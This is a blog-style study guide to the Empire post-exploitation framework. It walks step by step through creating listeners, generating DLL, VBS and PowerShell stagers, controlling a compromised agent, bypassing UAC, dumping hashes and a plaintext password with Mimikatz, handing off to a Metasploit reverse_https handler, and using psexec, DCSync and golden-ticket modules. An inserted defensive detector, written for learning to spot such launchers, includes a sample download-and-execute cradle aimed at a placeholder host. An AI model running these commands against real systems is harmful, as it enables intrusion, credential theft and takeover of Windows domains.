Marksec's Blog.

Empire Study Guide

Word count: 2.2k, reading time: 11 min
2018/12/06

Empire is a post-exploitation tool written in Python that works through PowerShell; it is a penetration testing framework in the spirit of Metasploit. Empire can run a PowerShell agent without needing powershell.exe, ships rapidly deployable post-exploitation modules ranging from keyloggers to Mimikatz, and supports adaptable communications to evade network detection, all packaged in a framework focused on usability. The current Empire version is 2.5.

Installation and startup

git clone https://github.com/EmpireProject/Empire.git
cd Empire/
cd setup/
./install.sh
./empire

Module overview

Empire's main functional modules are:

(Empire) > help

Commands
========
agents Jump to the Agents menu. Agents that have called back
creds Add/display credentials to/from the database. Credentials stored in the database (mostly passwords and hashes)
exit Exit Empire
help Displays the help menu.
interact Interact with a particular agent. Interact with an existing agent
list Lists active agents or listeners. List the currently active listeners or agents
listeners Interact with active listeners. Enter the listener configuration menu
load Loads Empire modules from a non-standard folder. Load custom or third-party modules (default: Empire's current directory)
plugin Load a plugin file to extend Empire. Load a custom or third-party plugin
plugins List all available and active plugins. List all loaded plugins
preobfuscate Preobfuscate PowerShell module_source files Pre-obfuscation feature
reload Reload one (or all) Empire modules. Same as MSF's reload
report Produce report CSV and log files: sessions.csv, credentials.csv, master.log Produce a report
reset Reset a global option (e.g. IP whitelists). Reset IP whitelists/blacklists, obfuscation options, etc.
resource Read and execute a list of Empire commands from a file. Run a batch of Empire commands from a file
searchmodule Search Empire module names/descriptions. Search modules by keyword
set Set a global option (e.g. IP whitelists). Set IP whitelists/blacklists, obfuscation options, etc.
show Show a global option (e.g. IP whitelists). Show the current framework settings, i.e. the default values for set
usemodule Use an Empire module. Use a module
usestager Use an Empire stager. Use a stager

Usage

Create a listener
Start the listener
Use launcher to generate a PowerShell stager
Execute the code on the target machine
Interact with the agent
Run various modules
Bypass UAC to obtain admin privileges

First type listeners to enter the listener menu, then type uselistener followed by a space and press Tab to pick the connection type you want to generate; complete the basic listener settings and you are done. To delete a listener, simply use kill followed by its name.

(Empire) > listeners
(Empire: listeners) > uselistener
dbx http_com http_hop meterpreter redirector
http http_foreign http_mapi onedrive
(Empire: listeners) > uselistener http //select http
(Empire: listeners/http) > info //show the settings
(Empire: listeners/http) > set Name test //set the name
(Empire: listeners/http) > execute //start it
(Empire: listeners/http) > back //go back
(Empire: listeners) > list //list the current listeners

[*] Active listeners:

Name Module Host Delay/Jitter KillDate
---- ------ ---- ------------ --------
test http http://192.168.199.124:80 5/0.0

Next we generate the stager payload.

(Empire: listeners) > usestager //list the available stagers
multi/bash multi/war osx/dylib osx/macro windows/backdoorLnkMacro windows/ducky windows/launcher_sct windows/macroless_msword
multi/launcher osx/applescript osx/jar osx/pkg windows/bunny windows/hta windows/launcher_vbs windows/shellcode
multi/macro osx/application osx/launcher osx/safari_launcher windows/csharp_exe windows/launcher_bat windows/launcher_xml windows/teensy
multi/pyinstaller osx/ducky osx/macho osx/teensy windows/dll windows/launcher_lnk windows/macro

DLL stager:
(Empire: listeners) > usestager windows/dll
(Empire: stager/windows/dll) > info

Name: DLL Launcher

Description:
Generate a PowerPick Reflective DLL to inject with
stager code.

Options:

Name Required Value Description
---- -------- ------- -----------
Listener True Listener to use.
ProxyCreds False default Proxy credentials
([domain\]username:password) to use for
request (default, none, or other).
Obfuscate False False Switch. Obfuscate the launcher
powershell code, uses the
ObfuscateCommand for obfuscation types.
For powershell only.
Proxy False default Proxy to use for request (default, none,
or other).
Language True powershell Language of the stager to generate.
OutFile True /tmp/launcher.dll File to output dll to.
UserAgent False default User-agent string to use for the staging
request (default, none, or other).
Arch True x64 Architecture of the .dll to generate
(x64 or x86).
ObfuscateCommand False Token\All\1 The Invoke-Obfuscation command to use.
Only used if Obfuscate switch is True.
For powershell only.
StagerRetries False 0 Times for the stager to retry
connecting.


(Empire: stager/windows/dll) > set Listener test
(Empire: stager/windows/dll) > execute

[*] Stager output written out to: /tmp/launcher.dll

PowerShell stager:
(Empire: listeners) > launcher powershell test //for PowerShell, launcher powershell + listener name is enough

launcher_vbs stager:
(Empire: listeners) > usestager windows/launcher_vbs
(Empire: stager/windows/launcher_vbs) > info

Name: VBS Launcher

Description:
Generates a .vbs launcher for Empire.

Options:

Name Required Value Description
---- -------- ------- -----------
Listener True Listener to generate stager for.
OutFile False /tmp/launcher.vbs File to output .vbs launcher to,
otherwise displayed on the screen.
Obfuscate False False Switch. Obfuscate the launcher
powershell code, uses the
ObfuscateCommand for obfuscation types.
For powershell only.
ObfuscateCommand False Token\All\1,Launcher\PS\12467 The Invoke-Obfuscation command to use.
Only used if Obfuscate switch is True.
For powershell only.
Language True powershell Language of the stager to generate.
ProxyCreds False default Proxy credentials
([domain\]username:password) to use for
request (default, none, or other).
UserAgent False default User-agent string to use for the staging
request (default, none, or other).
Proxy False default Proxy to use for request (default, none,
or other).
StagerRetries False 0 Times for the stager to retry
connecting.


(Empire: stager/windows/launcher_vbs) > set Listener test
(Empire: stager/windows/launcher_vbs) > execute

[*] Stager output written out to: /tmp/launcher.vbs

For now we use the PowerShell stager for the callback experiment and then move on to studying the modules: paste the PowerShell stager on the target machine and it calls back.
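The launcher produced by launcher powershell is a one-liner that hides the window and runs a base64-encoded download cradle in memory, which is exactly what a defender should be hunting for in process-creation telemetry (Sysmon event 1, Windows 4688). The following detector is an added example written for this page, not code from the original post or from the Empire project; the sample command lines, the listener.example host and the scoring threshold are all constructed assumptions.

```python
import base64
import re
from typing import Optional

# Download-cradle patterns typical of an in-memory PowerShell launcher (heuristics).
DECODED_INDICATORS = (r"Net\.WebClient", r"DownloadString", r"\bIEX\b|Invoke-Expression")

def decode_encoded_command(b64: str) -> Optional[str]:
    """-EncodedCommand carries base64 of a UTF-16LE string; None if it does not decode."""
    try:
        return base64.b64decode(b64).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze_command_line(cmdline: str) -> dict:
    """Score one process command line for Empire-launcher-style traits."""
    tokens = cmdline.split()
    flags, hidden_window, decoded = set(), False, None
    for i, tok in enumerate(tokens):
        key = tok.lower().lstrip("-/")  # PowerShell accepts abbreviated switches (-noP, -w, -enc)
        nxt = tokens[i + 1] if i + 1 < len(tokens) else ""
        if key in ("nop", "noprofile"):
            flags.add("NoProfile")
        elif key == "sta":
            flags.add("STA")
        elif key in ("noni", "noninteractive"):
            flags.add("NonInteractive")
        elif key in ("w", "win", "windowstyle"):
            flags.add("WindowStyle")
            hidden_window = nxt.lower() in ("1", "hidden")
        elif key in ("e", "ec", "enc", "encodedcommand"):
            flags.add("EncodedCommand")
            decoded = decode_encoded_command(nxt)
    indicators = [p for p in DECODED_INDICATORS if decoded and re.search(p, decoded, re.I)]
    # Constructed scoring: hidden window and cradle indicators weigh more than bare switches.
    score = len(flags) + (2 if hidden_window else 0) + 2 * len(indicators)
    return {"flags": sorted(flags), "hidden_window": hidden_window,
            "decoded": decoded, "indicators": indicators, "suspicious": score >= 5}

def encode_for_powershell(script: str) -> str:
    """Build the base64 form PowerShell expects; used only for the constructed samples."""
    return base64.b64encode(script.encode("utf-16-le")).decode()

# Constructed sample telemetry (not real captures); listener.example is a placeholder host.
SAMPLE_LOGS = {
    "benign": "powershell.exe -NoProfile -enc " + encode_for_powershell("Get-Date"),
    "launcher": "powershell -noP -sta -w 1 -enc " + encode_for_powershell(
        "IEX (New-Object Net.WebClient).DownloadString('http://listener.example/')"),
}
```

Feed real command lines from your EDR or Sysmon export into analyze_command_line and review the decoded field of anything flagged; the threshold is deliberately conservative so that a plain -NoProfile -enc administrative script does not fire.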

(Empire: agents) > agents  //list the agents that have called back

[*] Active agents:

Name La Internal IP Machine Name Username Process PID Delay Last Seen
---- -- ----------- ------------ -------- ------- --- ----- ---------
A2B7YFVG ps 192.168.199.122 WIN-6S1ISV98BNM *TEST\Administrator powershell 3064 5/0.0 2018-11-04 03:09:33
(Empire: agents) > interact A2B7YFVG //connect to this target for operations; once inside, use help to learn the commands
(Empire: A2B7YFVG) > help //mimikatz, bypassuac and so on are available here

Agent Commands
==============
agents Jump to the agents menu.
back Go back a menu.
bypassuac Runs BypassUAC, spawning a new high-integrity agent for a listener. Ex. spawn <listener>
clear Clear out agent tasking.
creds Display/return credentials from the database.
download Task an agent to download a file.
exit Task agent to exit.
help Displays the help menu or syntax for particular commands.
info Display information about this agent
injectshellcode Inject listener shellcode into a remote process. Ex. injectshellcode <meter_listener> <pid>
jobs Return jobs or kill a running job.
kill Task an agent to kill a particular process name or ID.
killdate Get or set an agent's killdate (01/01/2016).
list Lists all active agents (or listeners).
listeners Jump to the listeners menu.
lostlimit Task an agent to change the limit on lost agent detection
main Go back to the main menu.
mimikatz Runs Invoke-Mimikatz on the client.
psinject Inject a launcher into a remote process. Ex. psinject <listener> <pid/process_name>
pth Executes PTH for a CredID through Mimikatz.
rename Rename the agent.
resource Read and execute a list of Empire commands from a file.
revtoself Uses credentials/tokens to revert token privileges.
sc Takes a screenshot, default is PNG. Giving a ratio means using JPEG. Ex. sc [1-100]
scriptcmd Execute a function in the currently imported PowerShell script.
scriptimport Imports a PowerShell script and keeps it in memory in the agent.
searchmodule Search Empire module names/descriptions.
shell Task an agent to use a shell command.
shinject Inject non-meterpreter listener shellcode into a remote process. Ex. shinject <listener> <pid>
sleep Task an agent to 'sleep interval [jitter]'
spawn Spawns a new Empire agent for the given listener name. Ex. spawn <listener>
steal_token Uses credentials/tokens to impersonate a token for a given process ID.
sysinfo Task an agent to get system information.
updatecomms Dynamically update the agent comms to another listener
updateprofile Update an agent connection profile.
upload Task an agent to upload a file.
usemodule Use an Empire PowerShell module.
workinghours Get or set an agent's working hours (9:00-17:00).

Module walkthrough

Module for checking UAC privilege-escalation methods

(Empire: agents) > interact V92TNFDK //enter the target
(Empire: V92TNFDK) > usemodule (space + Tab) //list the modules usable with usemodule; note that you must be interacting with an agent to use them, and UAC bypass requires a user in the Administrators group
(Empire: V92TNFDK) > usemodule privesc/powerup/allchecks //module that checks for privilege-escalation methods
(Empire: V92TNFDK) > execute //run the checks

UAC bypass module

(Empire: V92TNFDK) > bypassuac test //run the UAC bypass; after back, an agent whose username is marked with * has already been elevated

Domain environment information-gathering module

(Empire: V92TNFDK) > usemodule situational_awareness/network/bloodhound //BloodHound is a domain environment collection tool; while studying Empire I noticed its post-exploitation modules also integrate it, and I will cover the tool in detail later

Mimikatz module

(Empire: V92TNFDK) > mimikatz  //for a post-exploitation tool, hash dumping is indispensable
(Empire: V92TNFDK) > creds //list credentials; with pth the next step, token theft, is also possible

Credentials:

CredID CredType Domain UserName Host Password
------ -------- ------ -------- ---- --------
1 hash test.com Administrator WIN-6S1ISV98BNM e19ccf75ee54e06b06a5907af13cef42
2 hash test.com WIN-6S1ISV98BNM$ WIN-6S1ISV98BNM 256897bbd391086a1fea9e03a711487c
3 plaintext test.com Administrator WIN-6S1ISV98BNM P@ssw0rd
4 hash test.com WIN-6S1ISV98BNM$ WIN-6S1ISV98BNM c8c4141f359974d60d46e5a60e0f1407

Chaining with Metasploit

empire:
(Empire: agents) > interact V92TNFDK
(Empire: V92TNFDK) > usemodule code_execution/invoke_shellcode
(Empire: code_execution/invoke_shellcode) > info
(Empire: code_execution/invoke_shellcode) > set Lhost 10.0.0.86
(Empire: code_execution/invoke_shellcode) > set Lport 4433
(Empire: code_execution/invoke_shellcode) > execute

metasploit:
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf exploit(handler) > set lhost 192.168.199.122
msf exploit(handler) > set lport 4444
msf exploit(handler) > run

Other commonly used modules

(Empire: V92TNFDK) > usemodule situational_awareness/network/find_localadmin_access //load the local-admin-access discovery module
(Empire: V92TNFDK) > usemodule lateral_movement/invoke_psexec //psexec module, spawns a reverse agent laterally
(Empire: V92TNFDK) > usemodule credentials/mimikatz/dcsync //obtain the domain krbtgt hash
(Empire: V92TNFDK) > usemodule credentials/mimikatz/golden_ticket //obtain a golden ticket
(Empire: V92TNFDK) > usemodule situational_awareness/host/computerdetails //obtain system logs

Summary

Metasploit, Empire and Cobalt Strike are the three platforms used most often in day-to-day penetration testing; studying all three makes the work far more efficient. After Empire, I still need to write up my Cobalt Strike notes as well, since things get forgotten without regular summaries.

The material in this article references https://xz.aliyun.com/t/67
